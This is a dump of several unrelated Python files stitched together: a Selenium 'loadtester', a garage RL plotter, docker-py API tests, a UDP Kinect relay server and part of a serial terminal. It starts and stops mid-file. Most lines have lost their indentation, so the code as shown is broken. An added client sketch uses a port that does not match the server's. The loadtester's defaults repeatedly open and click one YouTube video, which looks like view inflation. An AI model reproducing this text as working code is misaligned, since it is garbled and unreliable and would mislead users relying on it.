work.put((lineno, line, patterns))
    print('join')
for p in pool:
p.join()
# get the results
# example: [(1, "foo"), (10, "bar"), (0, "start")]
    print(results)
|
pysel.py
|
import json
import time
from selenium import webdriver
import tkinter as tk
import threading
class Output():
def __init__(self):
self.outfile = open("log.log","a")
def write(self, what):
self.outfile.write(what)
class Operations():
def run(self):
for count in range(int(app.agents.get())):
t = threading.Thread(target=self.browse)
t.start()
    def browse(self):
        # Build the options before the driver so they are actually applied
        options = webdriver.ChromeOptions()
        options.add_argument('headless')
        browser = webdriver.Chrome(options=options)
        for step in range(int(app.run.get())):
            for address in app.address.get().split(";"):
                browser.get(address)
                time.sleep(int(app.delay.get()))
                for element in app.elements.get().split(";"):
                    browser.find_element_by_css_selector(element).click()
                    output.write(json.dumps((address, step, element, time.time())))
                    time.sleep(int(app.delay.get()))
        browser.close()
class Application(tk.Frame):
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.grid()
self.create_widgets()
def create_widgets(self):
self.address_label = tk.Label(self)
self.address_label["text"] = "Addresses: "
self.address_label.grid(row=1, column=0, sticky='', pady=5, padx=5)
self.address_value = tk.StringVar()
self.address_value.set("https://www.youtube.com/watch?v=mMNZi2rXDEo;https://www.youtube.com/watch?v=mMNZi2rXDEo")
self.address = tk.Entry(self, textvariable=self.address_value, width=70)
self.address.grid(row=1, column=1, sticky='W', padx=5)
self.run_label = tk.Label(self)
self.run_label["text"] = "Runs: "
self.run_label.grid(row=2, column=0, sticky='', padx=5)
self.run_value = tk.StringVar()
self.run_value.set("250")
self.run = tk.Entry(self, textvariable=self.run_value, width=10)
self.run.grid(row=2, column=1, sticky='W', pady=5, padx=5)
self.delay_label = tk.Label(self)
self.delay_label["text"] = "Delays: "
self.delay_label.grid(row=3, column=0, sticky='', padx=5)
self.delay_value = tk.StringVar()
self.delay_value.set("2")
self.delay = tk.Entry(self, textvariable=self.delay_value, width=10)
self.delay.grid(row=3, column=1, sticky='W', pady=5, padx=5)
self.agents_label = tk.Label(self)
self.agents_label["text"] = "Agents: "
self.agents_label.grid(row=4, column=0, sticky='', padx=5)
self.agents_value = tk.StringVar()
self.agents_value.set("1")
self.agents = tk.Entry(self, textvariable=self.agents_value, width=10)
self.agents.grid(row=4, column=1, sticky='W', pady=5, padx=5)
self.elements_label = tk.Label(self)
self.elements_label["text"] = "Elements: "
self.elements_label.grid(row=5, column=0, sticky='', padx=5)
self.elements_value = tk.StringVar()
self.elements_value.set(".ytp-progress-bar;.ytp-progress-bar")
self.elements = tk.Entry(self, textvariable=self.elements_value, width=70)
self.elements.grid(row=5, column=1, sticky='W', pady=5, padx=5)
self.send = tk.Button(self, text="Run", fg="green", command=operations.run)
self.send.grid(row=6, column=1, sticky='WE', padx=5)
self.quit = tk.Button(self, text="Quit", fg="red", command=self.master.destroy)
self.quit.grid(row=7, column=1, sticky='WE', padx=5, pady=(5))
if __name__ == "__main__":
root = tk.Tk()
root.wm_title("PySel Loadtester")
operations = Operations()
output = Output()
app = Application(master=root)
app.mainloop()
|
plotter.py
|
"""Renders rollouts of the policy as it trains."""
import atexit
from collections import namedtuple
from enum import Enum
import platform
from queue import Queue
from threading import Thread
import numpy as np
import tensorflow as tf
from garage.sampler.utils import rollout as default_rollout
__all__ = ['Plotter']
class Op(Enum):
"""Message types."""
STOP = 0
UPDATE = 1
DEMO = 2
Message = namedtuple('Message', ['op', 'args', 'kwargs'])
class Plotter:
"""Renders rollouts of the policy as it trains.
Usually, this class is used by sending plot=True to LocalRunner.train().
Args:
env (gym.Env): The environment to perform rollouts in. This will be
used without copying in the current process but in a separate thread,
so it should be given a unique copy (in particular, do not pass the
environment here, then try to pickle it, or you will occasionally get
crashes).
policy (garage.tf.Policy): The policy to do the rollouts with.
sess (tf.Session): The TensorFlow session to use.
graph (tf.Graph): The TensorFlow graph to use.
rollout (callable): The rollout function to call.
"""
# List containing all plotters instantiated in the process
__plotters = []
def __init__(self,
env,
policy,
sess=None,
graph=None,
rollout=default_rollout):
Plotter.__plotters.append(self)
self._env = env
self.sess = tf.compat.v1.Session() if sess is None else sess
self.graph = tf.compat.v1.get_default_graph(
) if graph is None else graph
with self.sess.as_default(), self.graph.as_default():
self._policy = policy.clone('plotter_policy')
self.rollout = rollout
self.worker_thread = Thread(target=self._start_worker, daemon=True)
self.queue = Queue()
# Needed in order to draw glfw window on the main thread
if 'Darwin' in platform.platform():
self.rollout(self._env,
self._policy,
max_path_length=np.inf,
animated=True,
speedup=5)
def _start_worker(self):
max_length = None
initial_rollout = True
try:
with self.sess.as_default(), self.sess.graph.as_default():
# Each iteration will process ALL messages currently in the
# queue
while True:
msgs = {}
# If true, block and yield processor
if initial_rollout:
msg = self.queue.get()
msgs[msg.op] = msg
# Only fetch the last message of each type
while not self.queue.empty():
msg = self.queue.get()
msgs[msg.op] = msg
else:
# Only fetch the last message of each type
while not self.queue.empty():
msg = self.queue.get_nowait()
msgs[msg.op] = msg
if Op.STOP in msgs:
self.queue.task_done()
break
if Op.UPDATE in msgs:
self._env, self._policy = msgs[Op.UPDATE].args
self.queue.task_done()
if Op.DEMO in msgs:
param_values, max_length = msgs[Op.DEMO].args
self._policy.set_param_values(param_values)
initial_rollout = False
self.rollout(self._env,
self._policy,
max_path_length=max_length,
animated=True,
speedup=5)
self.queue.task_done()
else:
if max_length:
self.rollout(self._env,
self._policy,
max_path_length=max_length,
animated=True,
speedup=5)
except KeyboardInterrupt:
pass
def close(self):
"""Stop the Plotter's worker thread."""
if self.worker_thread.is_alive():
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
self.queue.put(Message(op=Op.STOP, args=None, kwargs=None))
self.queue.join()
self.worker_thread.join()
@staticmethod
def get_plotters():
"""Return all garage.tf.Plotter's.
Returns:
list[garage.tf.Plotter]: All the garage.tf.Plotter's
"""
return Plotter.__plotters
def start(self):
"""Start the Plotter's worker thread."""
if not self.worker_thread.is_alive():
tf.compat.v1.get_variable_scope().reuse_variables()
self.worker_thread.start()
self.queue.put(
Message(op=Op.UPDATE,
args=(self._env, self._policy),
kwargs=None))
atexit.register(self.close)
def update_plot(self, policy, max_length=np.inf):
"""Update the policy being plotted.
Args:
policy (garage.tf.Policy): The policy to rollout.
max_length (int or float): The maximum length to allow a rollout to
be. Defaults to infinity.
"""
if self.worker_thread.is_alive():
self.queue.put(
Message(op=Op.DEMO,
args=(policy.get_param_values(), max_length),
kwargs=None))
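# A minimal usage sketch (illustrative assumptions: `env` is a gym.Env and
# `policy` is a garage.tf.Policy exposing clone()/get_param_values(); normally
# LocalRunner.train(plot=True) drives this class instead of calling it directly).
def _plotter_usage_sketch(env, policy):
    plotter = Plotter(env, policy)
    plotter.start()                               # launch the worker thread
    plotter.update_plot(policy, max_length=500)   # queue a DEMO rollout
    plotter.close()                               # drain the queue and join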
|
api_test.py
|
import datetime
import json
import os
import re
import shutil
import socket
import sys
import tempfile
import threading
import time
import io
import docker
import requests
from requests.packages import urllib3
import six
from .. import base
from . import fake_api
import pytest
try:
from unittest import mock
except ImportError:
import mock
DEFAULT_TIMEOUT_SECONDS = docker.constants.DEFAULT_TIMEOUT_SECONDS
def response(status_code=200, content='', headers=None, reason=None, elapsed=0,
request=None, raw=None):
res = requests.Response()
res.status_code = status_code
if not isinstance(content, six.binary_type):
content = json.dumps(content).encode('ascii')
res._content = content
res.headers = requests.structures.CaseInsensitiveDict(headers or {})
res.reason = reason
res.elapsed = datetime.timedelta(elapsed)
res.request = request
res.raw = raw
return res
def fake_resolve_authconfig(authconfig, registry=None):
return None
def fake_inspect_container(self, container, tty=False):
return fake_api.get_fake_inspect_container(tty=tty)[1]
def fake_resp(method, url, *args, **kwargs):
key = None
if url in fake_api.fake_responses:
key = url
elif (url, method) in fake_api.fake_responses:
key = (url, method)
if not key:
raise Exception('{0} {1}'.format(method, url))
status_code, content = fake_api.fake_responses[key]()
return response(status_code=status_code, content=content)
fake_request = mock.Mock(side_effect=fake_resp)
def fake_get(self, url, *args, **kwargs):
return fake_request('GET', url, *args, **kwargs)
def fake_post(self, url, *args, **kwargs):
return fake_request('POST', url, *args, **kwargs)
def fake_put(self, url, *args, **kwargs):
return fake_request('PUT', url, *args, **kwargs)
def fake_delete(self, url, *args, **kwargs):
return fake_request('DELETE', url, *args, **kwargs)
def fake_read_from_socket(self, response, stream):
return six.binary_type()
url_base = '{0}/'.format(fake_api.prefix)
url_prefix = '{0}v{1}/'.format(
url_base,
docker.constants.DEFAULT_DOCKER_API_VERSION)
class DockerClientTest(base.Cleanup, base.BaseTestCase):
def setUp(self):
self.patcher = mock.patch.multiple(
'docker.Client', get=fake_get, post=fake_post, put=fake_put,
delete=fake_delete,
_read_from_socket=fake_read_from_socket
)
self.patcher.start()
self.client = docker.Client()
# Force-clear authconfig to avoid tampering with the tests
self.client._cfg = {'Configs': {}}
def tearDown(self):
self.client.close()
self.patcher.stop()
def assertIn(self, object, collection):
if six.PY2 and sys.version_info[1] <= 6:
return self.assertTrue(object in collection)
return super(DockerClientTest, self).assertIn(object, collection)
def base_create_payload(self, img='busybox', cmd=None):
if not cmd:
cmd = ['true']
return {"Tty": False, "Image": img, "Cmd": cmd,
"AttachStdin": False,
"AttachStderr": True, "AttachStdout": True,
"StdinOnce": False,
"OpenStdin": False, "NetworkDisabled": False,
}
class DockerApiTest(DockerClientTest):
def test_ctor(self):
with pytest.raises(docker.errors.DockerException) as excinfo:
docker.Client(version=1.12)
self.assertEqual(
str(excinfo.value),
'Version parameter must be a string or None. Found float'
)
def test_url_valid_resource(self):
url = self.client._url('/hello/{0}/world', 'somename')
self.assertEqual(
url, '{0}{1}'.format(url_prefix, 'hello/somename/world')
)
url = self.client._url(
'/hello/{0}/world/{1}', 'somename', 'someothername'
)
self.assertEqual(
url,
'{0}{1}'.format(url_prefix, 'hello/somename/world/someothername')
)
url = self.client._url('/hello/{0}/world', 'some?name')
self.assertEqual(
url, '{0}{1}'.format(url_prefix, 'hello/some%3Fname/world')
)
url = self.client._url("/images/{0}/push", "localhost:5000/image")
self.assertEqual(
url,
'{0}{1}'.format(url_prefix, 'images/localhost:5000/image/push')
)
def test_url_invalid_resource(self):
with pytest.raises(ValueError):
self.client._url('/hello/{0}/world', ['sakuya', 'izayoi'])
def test_url_no_resource(self):
url = self.client._url('/simple')
self.assertEqual(url, '{0}{1}'.format(url_prefix, 'simple'))
def test_url_unversioned_api(self):
url = self.client._url(
'/hello/{0}/world', 'somename', versioned_api=False
)
self.assertEqual(
url, '{0}{1}'.format(url_base, 'hello/somename/world')
)
def test_version(self):
self.client.version()
fake_request.assert_called_with(
'GET',
url_prefix + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_version_no_api_version(self):
self.client.version(False)
fake_request.assert_called_with(
'GET',
url_base + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_retrieve_server_version(self):
client = docker.Client(version="auto")
self.assertTrue(isinstance(client._version, six.string_types))
self.assertFalse(client._version == "auto")
client.close()
def test_auto_retrieve_server_version(self):
version = self.client._retrieve_server_version()
self.assertTrue(isinstance(version, six.string_types))
def test_info(self):
self.client.info()
fake_request.assert_called_with(
'GET',
url_prefix + 'info',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_search(self):
self.client.search('busybox')
fake_request.assert_called_with(
'GET',
url_prefix + 'images/search',
params={'term': 'busybox'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_events(self):
self.client.events()
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={'since': None, 'until': None, 'filters': None},
stream=True
)
def test_events_with_since_until(self):
ts = 1356048000
now = datetime.datetime.utcfromtimestamp(ts)
since = now - datetime.timedelta(seconds=10)
until = now + datetime.timedelta(seconds=10)
self.client.events(since=since, until=until)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': ts - 10,
'until': ts + 10,
'filters': None
},
stream=True
)
def test_events_with_filters(self):
filters = {'event': ['die', 'stop'],
'container': fake_api.FAKE_CONTAINER_ID}
self.client.events(filters=filters)
expected_filters = docker.utils.convert_filters(filters)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': None,
'until': None,
'filters': expected_filters
},
stream=True
)
def _socket_path_for_client_session(self, client):
socket_adapter = client.get_adapter('http+docker://')
return socket_adapter.socket_path
def test_url_compatibility_unix(self):
c = docker.Client(base_url="unix://socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_unix_triple_slash(self):
c = docker.Client(base_url="unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http_unix_triple_slash(self):
c = docker.Client(base_url="http+unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http(self):
c = docker.Client(base_url="http://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_url_compatibility_tcp(self):
c = docker.Client(base_url="tcp://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_remove_link(self):
self.client.remove_container(fake_api.FAKE_CONTAINER_ID, link=True)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': True, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_create_host_config_secopt(self):
security_opt = ['apparmor:test_profile']
result = self.client.create_host_config(security_opt=security_opt)
self.assertIn('SecurityOpt', result)
self.assertEqual(result['SecurityOpt'], security_opt)
self.assertRaises(
TypeError, self.client.create_host_config, security_opt='wrong'
)
def test_stream_helper_decoding(self):
status_code, content = fake_api.fake_responses[url_prefix + 'events']()
content_str = json.dumps(content)
if six.PY3:
content_str = content_str.encode('utf-8')
body = io.BytesIO(content_str)
# mock a stream interface
raw_resp = urllib3.HTTPResponse(body=body)
setattr(raw_resp._fp, 'chunked', True)
setattr(raw_resp._fp, 'chunk_left', len(body.getvalue()) - 1)
# pass `decode=False` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp))
self.assertEqual(result, content_str)
# pass `decode=True` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp, decode=True))
self.assertEqual(result, content)
# non-chunked response, pass `decode=False` to the helper
setattr(raw_resp._fp, 'chunked', False)
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp))
self.assertEqual(result, content_str.decode('utf-8'))
# non-chunked response, pass `decode=True` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp, decode=True))
self.assertEqual(result, content)
class StreamTest(base.Cleanup, base.BaseTestCase):
def setUp(self):
socket_dir = tempfile.mkdtemp()
self.build_context = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, socket_dir)
self.addCleanup(shutil.rmtree, self.build_context)
self.socket_file = os.path.join(socket_dir, 'test_sock.sock')
self.server_socket = self._setup_socket()
self.stop_server = False
server_thread = threading.Thread(target=self.run_server)
        server_thread.daemon = True
server_thread.start()
self.response = None
self.request_handler = None
self.addCleanup(server_thread.join)
self.addCleanup(self.stop)
def stop(self):
self.stop_server = True
def _setup_socket(self):
server_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_sock.bind(self.socket_file)
# Non-blocking mode so that we can shut the test down easily
server_sock.setblocking(0)
server_sock.listen(5)
return server_sock
def run_server(self):
try:
while not self.stop_server:
try:
connection, client_address = self.server_socket.accept()
except socket.error:
# Probably no connection to accept yet
time.sleep(0.01)
continue
connection.setblocking(1)
try:
self.request_handler(connection)
finally:
connection.close()
finally:
self.server_socket.close()
def early_response_sending_handler(self, connection):
data = b''
headers = None
connection.sendall(self.response)
while not headers:
data += connection.recv(2048)
parts = data.split(b'\r\n\r\n', 1)
if len(parts) == 2:
headers, data = parts
mo = re.search(r'Content-Length: ([0-9]+)', headers.decode())
assert mo
content_length = int(mo.group(1))
while True:
if len(data) >= content_length:
break
data += connection.recv(2048)
@pytest.mark.skipif(
docker.constants.IS_WINDOWS_PLATFORM, reason='Unix only'
)
def test_early_stream_response(self):
self.request_handler = self.early_response_sending_handler
lines = []
for i in range(0, 50):
line = str(i).encode()
lines += [('%x' % len(line)).encode(), line]
lines.append(b'0')
lines.append(b'')
self.response = (
b'HTTP/1.1 200 OK\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n'
) + b'\r\n'.join(lines)
with docker.Client(base_url="http+unix://" + self.socket_file) \
as client:
for i in range(5):
try:
stream = client.build(
path=self.build_context,
stream=True
)
break
except requests.ConnectionError as e:
if i == 4:
raise e
self.assertEqual(list(stream), [
str(i).encode() for i in range(50)])
class UserAgentTest(base.BaseTestCase):
def setUp(self):
self.patcher = mock.patch.object(
docker.Client,
'send',
return_value=fake_resp("GET", "%s/version" % fake_api.prefix)
)
self.mock_send = self.patcher.start()
def tearDown(self):
self.patcher.stop()
def test_default_user_agent(self):
client = docker.Client()
client.version()
self.assertEqual(self.mock_send.call_count, 1)
headers = self.mock_send.call_args[0][0].headers
expected = 'docker-py/%s' % docker.__version__
self.assertEqual(headers['User-Agent'], expected)
def test_custom_user_agent(self):
client = docker.Client(user_agent='foo/bar')
client.version()
self.assertEqual(self.mock_send.call_count, 1)
headers = self.mock_send.call_args[0][0].headers
self.assertEqual(headers['User-Agent'], 'foo/bar')
|
KinectServerThreaded.py
|
import socket
import sys
import threading
# Create a list to hold all client objects
ProviderList = []
ReceiverList = []
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind the socket to the port
server_address = ('0.0.0.0', 1935)
print('starting up on %s port %s' % server_address, file=sys.stderr)
sock.bind(server_address)
class Receiver(object):
def __init__(self, name, address, subscription):
self.name = name
self.address = address
self.subscription = subscription
class Provider(object):
def __init__(self, name, address, configuration):
self.name = name
self.address = address
self.configuration = configuration
def process_message(data, address):
#print(sys.stderr, 'received %s from %s' % (data, address))
#print(sys.stderr, data)
split = data.decode().split("|")
if (split[0] == "JOIN"):
        # Add the new client to the appropriate client list (Should replace none with something else by default...)
if (split[1] == "PROVIDER"):
ProviderList.append(Provider(split[2], address, split[3]))
print("Provider %s joined the server" % (split[2]))
elif(split[1] == "RECEIVER"):
target = Provider('none', '0.0.0.0', 'none')
ReceiverList.append(Receiver(split[2], address, target))
print("Receiver %s joined the server" % (split[2]))
# Confirm to the new client that they're joined
message = "CONFIRM|JOIN|" + split[1] + "|" + split[2]+ "|"
sock.sendto(message.encode(), address)
# Notify all clients of the new user
message = "NOTICE|JOIN|" + split[1] + "|" + split[2]+ "|"
for receiver in ReceiverList:
sock.sendto(message.encode(), receiver.address)
elif (split[0] == "LEAVE"):
        # Remove the client from the appropriate client list
if(split[1] == "PROVIDER"):
for provider in ProviderList:
if(provider.name == split[2] and provider.address == address):
ProviderList.remove(provider)
print("Provider %s left the server" % (split[2]))
elif(split[1] == "RECEIVER"):
for receiver in ReceiverList:
if(receiver.name == split[2] and receiver.address == address):
ReceiverList.remove(receiver)
print("Receiver %s left the server" % (split[2]))
# Confirm to the client that they're removed
message = "CONFIRM|LEAVE|" + split[1] + "|" + split[2]+ "|"
sock.sendto(message.encode(), address)
# Notify everyone about the removed client
message = "NOTICE|LEAVE|" + split[1] + "|" + split[2]+ "|"
for provider in ProviderList:
sock.sendto(message.encode(), provider.address)
for receiver in ReceiverList:
sock.sendto(message.encode(), receiver.address)
elif (split[0] == "SUBSCRIBE"):
target = Provider('none', '0.0.0.0', 'none')
        # Find the target provider in the provider list
for provider in ProviderList:
if(provider.name == split[1]):
target = provider
        # Find the receiver in the receiver list and set their subscription target
for receiver in ReceiverList:
if(receiver.name == split[2] and receiver.address == address):
receiver.subscription = target
print("Receiver %s has subscribed to the provider %s" % (receiver.name, receiver.subscription.name))
# Confirm to the receiver that they're subscribed
message = "CONFIRM|SUBSCRIBE|" + split[1] + "|" + split[2]+ "|" + target.configuration
sock.sendto(message.encode(), address)
elif (split[0] == "UNSUBSCRIBE"):
target = Provider('none', '0.0.0.0', 'none')
        # Find the receiver in the receiver list and reset their subscription to the placeholder
for receiver in ReceiverList:
if(receiver.name == split[2] and receiver.address == address):
receiver.subscription = target
print("Receiver %s has unsubscribed from its provider" % (split[2]))
                # Confirm to the receiver that they're unsubscribed
message = "CONFIRM|UNSUBSCRIBE|" + split[2] + "|"
sock.sendto(message.encode(), address)
elif (split[0] == "PROVIDE"):
# Verify that the source provider and address is registered
for provider in ProviderList:
if(provider.name == split[1] and provider.address == address):
                # Confirm to the provider that the frame was received
message = "CONFIRM|PROVIDE|" + split[1] + "|" + split[2]+ "|" + split[4]+ "|"
sock.sendto(message.encode(), address)
# Forward the frame to all recipients subscribed to the provider
message = "NOTICE|PROVIDE|" + split[1] + "|" + split[2]+ "|" + split[3]+ "|" + split[4]+ "|" + split[5]+ "|"
for receiver in ReceiverList:
if(receiver.subscription.name == provider.name):
threading.Thread(target = sock.sendto, args=(message.encode(), receiver.address,)).start()
def listen_for_messages():
while True:
data, address = sock.recvfrom(50000)
threading.Thread(target = process_message, args=(data,address,)).start()
mainloop = threading.Thread(target=listen_for_messages, args=())
mainloop.start()
mainloop.join()
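# --- Illustrative sketch (not part of the original script) ---
# A minimal receiver client for the pipe-delimited UDP protocol handled by
# process_message() above (JOIN, SUBSCRIBE, NOTICE|PROVIDE and LEAVE frames).
# The server address below is a placeholder; substitute the host/port the
# relay actually binds its socket to.
def example_receiver(server=('127.0.0.1', 9999), name='demo_receiver', provider='demo_provider'):
    import socket
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # register as a receiver; the server answers with a CONFIRM|JOIN frame
    client.sendto(("JOIN|RECEIVER|%s|" % name).encode(), server)
    print(client.recvfrom(50000)[0].decode())
    # subscribe to a provider by name; the CONFIRM carries its configuration
    client.sendto(("SUBSCRIBE|%s|%s|" % (provider, name)).encode(), server)
    print(client.recvfrom(50000)[0].decode())
    # frames forwarded by the relay arrive as NOTICE|PROVIDE|... messages
    for _ in range(10):
        data, _ = client.recvfrom(50000)
        print(data.decode().split("|")[:3])
    # leave cleanly so the relay drops us from its receiver list
    client.sendto(("LEAVE|RECEIVER|%s|" % name).encode(), server)
    client.close()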
|
pyterm.py
|
#!/usr/bin/env python3
"""Simple Python serial terminal
"""
# Copyright (c) 2010-2018, Emmanuel Blot <emmanuel.blot@free.fr>
# Copyright (c) 2016, Emmanuel Bouaziz <ebouaziz@free.fr>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Neotion nor the names of its contributors may
# be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL NEOTION BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from argparse import ArgumentParser, FileType
from array import array
from atexit import register
from collections import deque
from io import TextIOBase
from logging import Formatter, DEBUG, ERROR, FATAL
from logging.handlers import SysLogHandler, WatchedFileHandler, SYSLOG_UDP_PORT
from os import devnull, fstat, isatty, linesep, name as osname, stat, uname
from os.path import abspath
from socket import gethostbyname
from sys import exit, modules, platform, stderr, stdin, stdout, __stdout__
from time import sleep
from threading import Event, Thread
from traceback import format_exc
from _thread import interrupt_main
mswin = platform == 'win32'
if not mswin:
from termios import TCSANOW, tcgetattr, tcsetattr
import local
from pyftdi import FtdiLogger
from tde.filterlog import get_term_formatter
from tde.misc import get_time_logger, to_int
from tde.term import getkey, is_term
# pylint: disable-msg=broad-except
# pylint: disable-msg=too-many-instance-attributes,too-many-arguments
# pylint: disable-msg=too-few-public-methods,too-many-branches
# pylint: disable-msg=too-many-nested-blocks
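# --- Illustrative sketch (not part of the original module) ---
# On POSIX hosts, MiniTerm (below) snapshots the termios settings of
# stdin/stdout/stderr at start-up and restores them in _cleanup(), so that a
# full/raw terminal session cannot leave the console in a broken state.
# A minimal stand-alone version of that save/restore pattern:
def _example_termios_guard():
    if mswin or not stdin.isatty():
        return
    fd = stdin.fileno()
    saved = tcgetattr(fd)               # snapshot the current settings
    try:
        pass                            # ...switch to raw mode and do work here...
    finally:
        tcsetattr(fd, TCSANOW, saved)   # always restore the snapshot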
class MiniTerm:
"""A mini serial terminal to demonstrate pyserial extensions"""
DEFAULT_BAUDRATE = 115200
def __init__(self, device, baudrate=None, parity=None, rtscts=False,
logfilter=False, logfile=None, filelog=None, syslog=None,
debug=False):
self._termstates = []
self._out = stdout
if not mswin and self._out.isatty():
fds = [fd.fileno() for fd in (stdin, stdout, stderr)]
self._termstates = [(fd, tcgetattr(fd) if isatty(fd) else None)
for fd in fds]
self._device = device
self._baudrate = baudrate or self.DEFAULT_BAUDRATE
self._resume = False
self._silent = False
self._rxq = deque()
self._rxe = Event()
self._debug = debug
self._log = self._get_logger(filelog, syslog)
self._logfile = (None, None)
self._logfilter = logfilter
self._filterbuf = bytearray()
self._port = self._open_port(self._device, self._baudrate, parity,
rtscts, debug)
if logfile:
self._logfile_init(logfile)
register(self._cleanup)
def run(self, fullmode=False, loopback=False, silent=False,
localecho=False, autocr=False):
"""Switch to a pure serial terminal application"""
        # wait forever, although Windows is stupid and does not signal Ctrl+C,
        # so use a 1/2-second timeout that gives some time to check for a
        # Ctrl+C break and then poll again...
print('Entering minicom mode')
self._out.flush()
self._set_silent(silent)
self._port.timeout = 0.5
self._resume = True
# start the reader (target to host direction) within a dedicated thread
args = [loopback]
if self._device.startswith('ftdi://'):
            # with the pyftdi/pyusb/libusb stack, there is no kernel buffering,
            # which means that a UART source with a data burst may overflow the
            # FTDI HW buffer while the SW stack is dealing with formatting and
            # console output. Use an intermediate thread to pop data out of the
            # HW as soon as it is made available, and use a deque to serve the
            # actual reader thread
args.append(self._get_from_source)
sourcer = Thread(target=self._sourcer)
            sourcer.daemon = True
sourcer.start()
else:
# regular kernel buffered device
args.append(self._get_from_port)
reader = Thread(target=self._reader, args=tuple(args))
        reader.daemon = True
reader.start()
# start the writer (host to target direction)
self._writer(fullmode, silent, localecho, autocr)
def pulse_dtr(self, delay):
"""Generate a pulse on DTR, which may be associated w/ HW reset."""
if self._port:
self._port.dtr = True
sleep(delay)
self._port.dtr = False
def _sourcer(self):
try:
while self._resume:
data = self._port.read(4096)
if not data:
continue
self._rxq.append(data)
self._rxe.set()
except Exception as ex:
self._resume = False
print(str(ex), file=stderr)
interrupt_main()
def _get_from_source(self):
while not self._rxq and self._resume:
if self._rxe.wait(0.1):
self._rxe.clear()
break
if not self._rxq:
return array('B')
return self._rxq.popleft()
def _get_from_port(self):
try:
return self._port.read(4096)
except OSError as ex:
self._resume = False
print(str(ex), file=stderr)
interrupt_main()
except Exception as ex:
print(str(ex), file=stderr)
return array('B')
def _reader(self, loopback, getfunc):
"""Loop forever, processing received serial data in terminal mode"""
if self._logfilter:
self._logfilter.start()
try:
# Try to read as many bytes as possible at once, and use a short
# timeout to avoid blocking for more data
self._port.timeout = 0.050
while self._resume:
data = getfunc()
if data:
if self._logfile[0]:
self._logfile_reopen_if_needed()
self._logfile[0].write(data)
if b'\n' in data:
self._logfile[0].flush()
if self._logfilter:
start = 0
while True:
pos = data[start:].find(b'\n')
if pos != -1:
pos += start
self._filterbuf += data[start:pos]
try:
self._logfilter.inject(self._filterbuf,
self._log)
except AttributeError:
# Special case: on abort, _logfilter is
# reset; stop injection in this case
if self._logfilter:
raise
break
except Exception as ex:
print('[INTERNAL] Filtering error with '
'string: %s' % ex, file=stderr)
print(' ', self._filterbuf.decode(
'utf8', errors='ignore'), file=stderr)
if self._debug:
print(format_exc(), file=stderr)
self._filterbuf = bytearray()
start = pos+1
else:
self._filterbuf += data[start:]
break
continue
logstr = data.decode('utf8', errors='replace')
self._out.write(logstr)
self._out.flush()
if self._log:
self._log.info(logstr.rstrip())
if loopback:
self._port.write(data)
except KeyboardInterrupt:
return
except Exception as exc:
print("Exception: %s" % exc)
if self._debug:
print(format_exc(chain=False), file=stderr)
interrupt_main()
def _writer(self, fullmode, silent, localecho, crlf=0):
"""Loop and copy console->serial until EOF character is found"""
while self._resume:
try:
inc = getkey(fullmode)
if not inc:
sleep(0.1)
continue
if mswin:
if ord(inc) == 0x3:
raise KeyboardInterrupt()
if fullmode and ord(inc) == 0x2: # Ctrl+B
self._cleanup()
return
if silent:
if ord(inc) == 0x6: # Ctrl+F
self._set_silent(True)
print('Silent\n')
continue
if ord(inc) == 0x7: # Ctrl+G
self._set_silent(False)
print('Reg\n')
continue
else:
if localecho:
self._out.write(inc.decode('utf8', errors='replace'))
self._out.flush()
if crlf:
if inc == b'\n':
self._port.write(b'\r')
if crlf > 1:
continue
self._port.write(inc)
except KeyboardInterrupt:
if fullmode:
continue
